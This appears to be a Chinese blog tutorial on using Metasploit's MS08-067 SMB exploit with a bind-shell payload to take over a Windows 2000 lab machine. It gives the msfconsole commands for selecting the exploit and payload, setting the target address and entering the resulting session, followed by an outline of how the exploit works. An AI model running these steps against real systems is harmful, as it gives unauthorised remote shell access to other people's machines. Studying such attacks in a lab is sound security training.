不多说,直接上干货!

  本博文举的例,是利用远程溢出windows服务器。

   Exploit/windows/smb/ms08_067_netapi。

   Payload :    windows/shell/bind_tcp

  Target:  windows 2000

  

  以下是受害者机器情况。

  以下是攻击者机器

  这是show  exploits

  use   exploit/windows/smb/ms08_067_netapi

  以下是show payloads

  set  PAYLOAD   windows/shell/bind_tcp

  set   RHOSt    192.168.0.15

  show  targets

   如果将targets什么都不设置,或者设置为0的话,它就是自动探测。

  即,此刻,就是已经成功攻下了受害者机器。

  然后,做我们想要做的事情了。

  它会将我们从攻击者到受害者机器,的这一过程建议一个会话。在后台。

   通过session来查看。

  通过session -h来查看session命令的使用。

 

  一般用session -i  编号来切入到会话。

  总结  exploits + payloads + taegets

1、连接到远程系统的漏洞端口

2、交换协议序列直到到达漏洞触发点

3、注入利用代码,其中包含了直接或间接的修改

  返回地址为我们payload的指令以及nop指令,这增加了我们的代码被执行的机会。

4、 后续利用,可以是在受害主机上绑定任意端口的命令提示符或一个已经被创建的用户连接到远程系统或可能是一个GUI客户端连接到远程系统

最新文章

  1. 讲解JS的promise,这篇是专业认真的!
  2. 关于padding与margin的区别
  3. sdutoj 2151 Phone Number
  4. windows 7 下安装 IIS 和 ArcGis Server 9.3 遇到的问题及解决方法
  5. Java—static、this、super用法总结
  6. 支付宝开发(一)-认识php openssl RSA 非对称加密实现
  7. mysql 保留的关键字
  8. RMAN传输表空间迁移数据
  9. VIM命令集
  10. loadrunner入门篇-Analysis 分析器
  11. JDK1.8源码(七)——java.util.HashMap 类
  12. document.getElementById(), getElementsByname(),getElementsByClassName(),getElementsByTagName()方法表示什么以及其意义
  13. DLG消息
  14. cbow与skip-gram
  15. .Net ASP.NET 打开指定文件夹
  16. siege 高并发测试工具
  17. 【Oracle】【6】去掉字符串最后一个特殊字符
  18. 【九校联考-24凉心模拟】锻造(forging)
  19. UVa 442 Matrix Chain Multiplication(栈的应用)
  20. testng入门教程16数据驱动(把数据写在xml)

热门文章

  1. USACO 2.1 Healthy Holsteins
  2. go并发设计模式 --资源生成器模式
  3. ROS-导航功能-RVIZ
  4. MFC+OpenGL可编程管线
  5. CDR实例教程-高考789,敢拼就能赢!
  6. EFCore笔记之异步查询
  7. 动态生成的dom元素绑定事件
  8. 凸多边形 HRBUST - 1429 计算几何_凸包_未调完
  9. 连连看 HDU - 1175_搜索_剪枝
  10. maven的pom.xml配置json依赖